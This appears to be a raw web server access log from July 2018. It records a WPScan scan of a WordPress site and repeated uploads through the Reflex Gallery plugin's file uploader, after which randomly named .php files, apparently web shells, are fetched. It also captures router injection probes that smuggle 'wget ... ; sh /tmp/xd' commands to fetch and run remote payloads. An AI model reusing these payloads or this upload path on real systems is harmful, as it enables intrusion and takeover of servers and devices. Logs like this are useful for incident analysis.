94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/fonts/dashicons.woff HTTP/1.1 26124 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:03 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/fonts/dashicons.eot HTTP/1.1 22449 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:04 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /b2-img/smilies/icon_biggrin.gif HTTP/1.1 306 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:04 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/autosave.min.js HTTP/1.1 5646 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:04 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /b2-img/smilies/icon_sad.gif HTTP/1.1 302 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:04 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /b2-img/smilies/icon_neutral.gif HTTP/1.1 306 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:04 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /b2-img/smilies/icon_question.gif HTTP/1.1 307 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:05 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/plupload/wp-plupload.js HTTP/1.1 12714 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:05 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/css/admin-bar.min.css HTTP/1.1 20626 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:05 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /layout2b.css HTTP/1.1 287 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:05 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-links/links-images/rating-6.gif HTTP/1.1 309 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:05 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-links/links-images/rating-0.gif HTTP/1.1 309 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:05 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/b2menutop.txt HTTP/1.1 297 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:06 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/window.css HTTP/1.1 347 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:06 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/plugins/wpeditimage/js/editimage.js HTTP/1.1 333 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:06 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/plugins/wpeditimage/editimage.html HTTP/1.1 332 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:06 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/themes/advanced/skins/wp_theme/content.css HTTP/1.1 340 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:07 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/user-profile.js HTTP/1.1 12533 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:07 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/widgets/media-widgets.min.js HTTP/1.1 13224 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:10:07 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:10:08 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/dashboard.dev.js HTTP/1.1 303 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:08 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/wp-ajax-response.js HTTP/1.1 3135 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:08 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/wp-api.min.js HTTP/1.1 13623 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:08 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/wp-api.js HTTP/1.1 43130 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:09 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/imgareaselect/jquery.imgareaselect.js HTTP/1.1 38133 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:10 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/widgets.min.css HTTP/1.1 10988 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:10 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/twemoji.min.js HTTP/1.1 9007 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:10 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/twemoji.js HTTP/1.1 25687 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:11 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/widgets-rtl.min.css HTTP/1.1 10988 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:11 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/customize-selective-refresh.js HTTP/1.1 32784 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:12 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/updates.js HTTP/1.1 79108 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:12 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/css/customize-preview-rtl.css HTTP/1.1 6497 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:13 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /feed/ HTTP/1.1 280 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:13 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /feed/rdf/ HTTP/1.1 284 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:13 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /feed/atom/ HTTP/1.1 285 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:13 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /readme.html HTTP/1.1 7413 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:13 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /sitemap.xml HTTP/1.1 286 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:13 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-links-opml.php HTTP/1.1 223 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:14 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/style.css HTTP/1.1 82584 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:15 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/readme.txt HTTP/1.1 319 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:15 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/README.txt HTTP/1.1 3219 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:16 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/changelog.txt HTTP/1.1 322 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:16 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/CHANGELOG.md HTTP/1.1 321 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:16 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/changelog.md HTTP/1.1 321 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:16 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/ HTTP/1.1 - "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:17 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/themes/twentyseventeen/error_log HTTP/1.1 318 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:18 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/readme.txt HTTP/1.1 8632 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:18 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/changelog.txt HTTP/1.1 322 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:18 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/CHANGELOG.md HTTP/1.1 321 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:19 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/changelog.md HTTP/1.1 321 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:19 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/ HTTP/1.1 3482 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:10:19 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/error_log HTTP/1.1 318 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:20:20 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/readme.txt HTTP/1.1 8632 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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[23/Jul/2018:11:20:26 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 POST /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2018&amp;Month=07 HTTP/1.1 55 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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218.211.168.176 - - [23/Jul/2018:11:22:49 +0000] "GET / HTTP/1.1" 200 606 "-" "Mozilla/5.0"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[23/Jul/2018:11:22:57 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/readme.txt HTTP/1.1 8632 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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[23/Jul/2018:11:23:04 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 POST /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2018&amp;Month=07 HTTP/1.1 54 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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[23/Jul/2018:11:23:56 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 POST /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2018&amp;Month=07 HTTP/1.1 61 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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[23/Jul/2018:11:20:28 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2018/07/PSMOfbPom.php HTTP/1.1 2 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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[23/Jul/2018:11:23:57 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2018/07/XLPYhlEtQOyiMKb.php HTTP/1.1 2 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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[23/Jul/2018:11:25:35 +0000] ganga.site 88.0.112.115 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 POST /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2018&amp;Month=07 HTTP/1.1 61 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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[23/Jul/2018:11:23:05 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2018/07/yDdoSpsx.php HTTP/1.1 2 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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88.132.175.225 - - [23/Jul/2018:11:41:11 +0000] "GET / HTTP/1.0" 200 982 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"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[23/Jul/2018:11:25:35 +0000] ganga.site 88.0.112.115 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2018/07/vmGAbaiewrSSuMs.php HTTP/1.1 2 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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[23/Jul/2018:11:53:18 +0000] ganga.site 88.0.112.115 - - GET / HTTP/1.0 439 "-" "-"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[23/Jul/2018:11:53:18 +0000] ganga.site 88.0.112.115 - - GET / HTTP/1.0 439 "-" "-"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[23/Jul/2018:11:53:18 +0000] ganga.site 88.0.112.115 - - GET / HTTP/1.0 439 "-" "-"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[23/Jul/2018:11:53:50 +0000] ganga.site 88.0.112.115 - - GET / HTTP/1.0 439 "-" "-"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[23/Jul/2018:11:53:50 +0000] ganga.site 88.0.112.115 - - GET / HTTP/1.0 439 "-" "-"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[23/Jul/2018:11:53:51 +0000] ganga.site 88.0.112.115 - - GET / HTTP/1.0 439 "-" "-"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[23/Jul/2018:11:53:58 +0000] ganga.site 88.0.112.115 - - GET / HTTP/1.0 439 "-" "-"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[23/Jul/2018:11:54:18 +0000] ganga.site 88.0.112.115 - - GET / HTTP/1.0 439 "-" "-"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[23/Jul/2018:11:54:31 +0000] ganga.site 88.0.112.115 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins/reflex-gallery/readme.txt HTTP/1.1 8632 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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[23/Jul/2018:11:54:34 +0000] ganga.site 88.0.112.115 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 POST /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2018&amp;Month=07 HTTP/1.1 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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[23/Jul/2018:12:00:25 +0000] ganga.site 88.0.112.115 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET / HTTP/1.1 191819 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"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[23/Jul/2018:11:54:34 +0000] ganga.site 88.0.112.115 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/2018/07/PLoeJFOEVoc.php HTTP/1.1 2 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"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86.60.204.220 - - [23/Jul/2018:12:45:33 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"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[23/Jul/2018:14:07:36 +0000] ganga.site 184.105.247.196 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET / HTTP/1.1 259510 "-" "-"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[23/Jul/2018:14:45:29 +0000] ganga.site 13.56.248.111 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /ws/2/ HTTP/1.1\n 303 "-" "-"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46.48.233.147 - - [23/Jul/2018:15:28:19 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"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143.208.184.92 - - [23/Jul/2018:16:04:06 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"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115.78.133.167 - - [23/Jul/2018:16:43:58 +0000] "GET /manager/html HTTP/1.1" 404 450 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"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89.111.244.174 - - [23/Jul/2018:16:45:44 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"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185.10.68.233 - - [23/Jul/2018:17:27:17 +0000] "GET / HTTP/1.1" 400 0 "-" "-"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[23/Jul/2018:18:26:24 +0000] ganga.site 13.57.233.99 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET / HTTP/1.1 191819 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"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[23/Jul/2018:19:17:10 +0000] ganga.site 5.188.210.7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /?q=node/2 HTTP/1.0 259510 "https://ganga.site/?q=node/2" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"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138.186.147.94 - - [23/Jul/2018:19:55:25 +0000] "GET / HTTP/1.0" 200 982 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"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137.74.30.57 - - [23/Jul/2018:20:50:07 +0000] "GET / HTTP/1.1" 400 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"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92.38.46.186 - - [23/Jul/2018:22:09:06 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"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31.202.42.113 - - [23/Jul/2018:22:46:51 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"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187.101.58.33 - - [23/Jul/2018:23:21:39 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"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[24/Jul/2018:00:21:51 +0000] ganga.site 5.188.210.7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /?q=node/2 HTTP/1.0 259510 "https://ganga.site/?q=node/2" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"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80.234.103.236 - - [24/Jul/2018:00:33:58 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"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114.180.171.62 - - [24/Jul/2018:00:34:48 +0000] "GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&amp;ping_ip=google.ca%20%3B%20wget%20http://178.128.11.199/exploit HTTP/1.0" 404 520 "-" "-"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195.248.187.15 - - [24/Jul/2018:01:06:31 +0000] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"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156.209.168.75 - - [24/Jul/2018:02:06:15 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://199.195.254.118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$ HTTP/1.1" 400 0 "-" "Gemini/2.0"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[24/Jul/2018:03:05:52 +0000] ganga.site 108.61.134.250 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET //a2billing/customer/templates/default/footer.tpl HTTP/1.1 325 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-862.2.3.el7.x86_64"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41.234.49.58 - - [24/Jul/2018:03:08:33 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://199.195.254.118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$ HTTP/1.1" 400 0 "-" "Gemini/2.0"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[24/Jul/2018:03:19:20 +0000] ganga.site 5.188.210.7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /?q=node/2 HTTP/1.0 259510 "https://ganga.site/?q=node/2" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"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41.236.20.159 - - [24/Jul/2018:03:20:45 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://199.195.254.118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$ HTTP/1.1" 400 0 "-" "Gemini/2.0"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171.235.251.172 - - [24/Jul/2018:03:30:09 +0000] "GET / HTTP/1.0" 200 942 "-" "-"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95.165.176.230 - - [24/Jul/2018:03:40:28 +0000] "GET / HTTP/1.0" 200 942 "-" "-"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109.94.177.117 - - [24/Jul/2018:04:42:00 +0000] "GET / HTTP/1.0" 200 942 "-" "-"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[24/Jul/2018:05:18:49 +0000] ganga.site 23.226.128.37 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET / HTTP/1.1 191819 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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[24/Jul/2018:05:18:51 +0000] ganga.site 23.226.128.37 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /favicon.ico HTTP/1.1 286 "https://ganga.site/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"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::1 - - [24/Jul/2018:05:19:11 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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